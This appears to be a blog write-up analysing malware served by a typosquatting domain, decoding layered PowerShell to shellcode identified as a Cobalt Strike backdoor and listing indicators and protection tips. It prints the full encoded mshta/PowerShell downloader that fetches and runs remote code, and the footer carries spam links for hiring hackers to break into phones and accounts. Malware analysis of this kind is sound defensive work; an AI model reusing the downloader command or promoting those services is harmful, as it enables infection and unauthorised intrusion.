Typo Squatting Malware: 1 Comprehensive Analysis

What is Typo squatting Malware?

Typosquatting malware is a type of cyber attack that involves registering a domain name that is very similar to a legitimate website.

The attacker then uses this domain to trick users into thinking they are visiting a legitimate site, when in fact they are visiting a malicious site that is designed to infect their computer with malware.

According to Wikipedia, “Typosquatting, also called URL hijacking, a sting site, or a fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser.

Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).”

How Does Typo squatting Malware Work?

Typosquatting malware works by taking advantage of common typing errors that users make when trying to visit a website.

Cybercriminals create websites that look very similar to legitimate ones, with just a slight difference in the URL. For example, they might create a website called www.goggle.com instead of www.google.com. When a user mistypes the URL, they end up on the fake website, which can look almost identical to the real one.

The fake website is designed to trick the user into entering sensitive information, such as login credentials, credit card numbers, or other personal data. Once the user enters the information, the malware on the fake website can capture it and send it back to the cyber criminals.

Some cyber criminals purchase domains similar to the ones you visit every day, hoping that during one of those evenings you are trying to watch funny cat videos on youtube.com, you accidentally type youtubr.com (example).

In this write up I will go over one of such cases I recently came across and I will analyze the malware that the malicious domain would download, with some (but not a whole lot) technical detail.

In our example, if you had misspelled just one letter in the URL you would be redirected to the following page (I am not providing the actual domain for confidentiality reasons).

TypoSquatting Malware Analysis

As we can see from any.run analysis, there is quite a lot going on once you navigate to this suspicious website

TypoSquatting Malware Analysis

The first command executed is

mshta vbscript:createobject(“wscript.shell”).run(“PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcAA6AC8ALwBrADAAawB6AC4AcgB1AC8AaQAuAHAAaABwAD8AaQA9ADEAJwA7AGkAZQB4ACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACQAYQApADsATQBzAGkATQBhAGsAZQAoACIAJABhACIAKwAnADUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwAwAA0ACgB9AA0ACgA=”,0)(window.close)

mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion.

As we can see there is a base64 encoded payload run with PowerShell. Let’s see what it does.

TypoSquatting Malware Analysis

Looks like our base64 encoded PowerShell is trying to reach out to some “http://kokz[.]ru/” to download and run the string with IEX. The IEX (Invoke-Expression) cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.

Interesting… let’s see what it is trying to download.

TypoSquatting Malware Analysis

woah! that’s a lot of base64. let’s try to decode it and understand what it is doing.

TypoSquatting Malware Analysis

After base64 decoding the previous image we get this. Looks like another base64 encoded string, however now we also see that the script is trying to decompress Gzip compression.

TypoSquatting Malware Analysis

Let’s base64 decode the string one more time and let’s save it into a file. As we can see the file command tells us that we have GZip compressed data just as we guessed.

TypoSquatting Malware Analysis
TypoSquatting Malware Analysis

After extracting the gzip compressed file we get another PowerShell script.

The following piece of code looks particularly interesting.

TypoSquatting Malware Analysis

Here we have another base64 encoded payload, that is first base64 decoded and later there is done some byte arithmetic inside a for loop. Let’s see what is it exactly and as any cautious person would do, run the lines in PowerShell interpreter on our machine (NSFW).

TypoSquatting Malware Analysis

We let the PowerShell do the arithmetic, that way we have less code to write. What we end up with, is a variable “$var_code” with around 800 lines of different numbers.

TypoSquatting Malware Analysis

I wrote a small python script to convert the decimals we got from the PowerShell script into a byte array and write it to a file.

Let’s run the python script which will write the $var_code to out.bin file.

TypoSquatting Malware Analysis

hmm… sus. Looks like a binary file with some gibberish but also some useful strings which are readable.

TypoSquatting Malware Analysis
TypoSquatting Malware Analysis

We are left with what appears to be the shell code. With the Strings command we can also see the host “cdn.hmthiooace.cfd”

let’s check out the file “out.bin” and hostname found in the ‘strings’ command output on Virustotal.

TypoSquatting Malware AnalysisTypoSquatting Malware Analysis
TypoSquatting Malware Analysis

Numerous security vendors identify the file as a CobaltStrike backdoor. I guess we will go with that!

BLUF: try not to fat-finger wrong URLs 🙂

Happy Hacking!

6b0b01673bb039edac2fb13817cc97605b25b9d66a3df0b543ca168fabb748b1

8FD0BD7F52CCA856BE4BEAE0EF42C234712A98E7

k0kz[.]ru

kvte[.]shop

geketw.mscpdtyont[.]shop

juk.linkapplied[.]com

cdn.hmthiooace[.]cfd

188.114.96[.]3

188.114.97[.]3

185.107.56[.]192

198.134.116[.]17

209.15.13[.]136

178.79.242[.]0

How to Protect Yourself from Typosquatting Malware

There are several steps you can take to protect yourself from typo squatting malware:

  1. Be careful when entering web addresses: Double-check the URL before hitting “Enter” to ensure you are on the legitimate website.
  2. Use a password manager: Password managers can help protect your login credentials from being stolen by malware.
  3. Keep your software up-to-date: Cybercriminals often exploit security vulnerabilities in outdated software to infect devices with malware. Make sure you regularly update your software to protect yourself.
  4. Use antivirus software: Antivirus software can detect and remove malware from your device. Make sure you have a reputable antivirus program installed and keep it up-to-date.
Conclusion

In conclusion, typosquatting malware is a serious threat to businesses and individuals alike. By understanding how it works and taking steps to protect yourself, you can reduce your risk of falling victim to this type of attack. If you have any questions or concerns about typosquatting malware, please don’t hesitate to contact us for more information.

administrator

Leave a Reply

Your email address will not be published. Required fields are marked *

fb logo
recover dogecoin from a scam
recover ethereum from a scammer
hire a hacker to hack iphone
hire a hacker to hack snapchat
hire a hacker to hack a windows computer
error: Content is protected !!